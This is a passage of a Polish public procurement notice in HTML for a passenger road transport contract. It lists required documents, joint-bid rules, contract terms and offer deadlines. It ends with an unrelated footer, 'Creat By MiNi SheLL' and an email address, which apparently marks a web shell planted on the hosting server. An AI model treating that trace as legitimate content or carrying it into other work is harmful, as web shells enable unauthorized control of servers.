przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Zamawiający nie wzywa do złożenia odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz<br/>danych, w szczególności rejestrów publicznych w rozumieniu ustawy o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w ust. 1, dane umożliwiające dostęp do tych środków.<br/>Zamawiający może żądać od<br/>Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie<br/>przez Zamawiającego podmiotowych środków dowodowych lub dokument</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w Rozdziale VIII ust. 1 pkt 2 SWZ:<br/>a)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie pojazdami oraz koordynowania transportu, wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami <br/>b)	wykazu środków transportu przewidzianych do realizacji zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami <br/>c)	aktualnych uprawnień: odpowiednie, zezwolenie lub licencję na wykonywanie transportu drogowego osób zgodnie z ustawą o transporcie drogowym.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę, składa się:<br/>1) Formularz oferty zawierający wszystkie informacje i oświadczenia wskazane w jego treści;<br/>2) oświadczenie, o którym mowa w Rozdziale X ust.1 SWZ;<br/>3) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (jeżeli w imieniu Wykonawcy lub Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których<br/>mowa w Rozdziale X ust. 3 pkt 1 lit. b SWZ );<br/>4) zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w Rozdziale XI ust. 3 SWZ wraz z pełnomocnictwem,<br/>jeżeli prawo do podpisania zobowiązania nie wynika z dokumentów, o których mowa w Rozdziale X ust. 3 pkt 1 lit. b SWZ (jeżeli dotyczy);<br/>5) oświadczenie podmiotu udostępniającego zasoby, składane na podstawie art. 125 ust. 5 ustawy Pzp, o którym mowa w Rozdziale XI ust. 8 SWZ (jeżeli dotyczy);<br/>6) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4<br/>ustawy Pzp, o którym mowa w Rozdziale XII ust. 5 SWZ (jeżeli dotyczy);<br/>7) Dokumenty potwierdzające, że zastrzeżone w ofercie informację stanowią tajemnicę przedsiębiorstwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być dołączone do oferty.<br/>3.	W przypadku wspólnego ubiegania się o zamówienia przez Wykonawców, oświadczenie, o którym mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5.	W przypadku, o którym mowa w ust. 4, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy .<br/>6.	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, każdy z nich zobowiązany jest złożyć, na wezwanie Zamawiającego, podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia z postępowania, określone w Rozdziale X ust. 3 pkt 1 SWZ, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wspólnie wykazują zgodnie z Rozdziałem VIII ust. 1 pkt 2 lit. d SWZ . <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określają projektowane postanowienia umowy (zał. nr 8 do SWZ) udostępnione na stronie prowadzonego postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-26 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com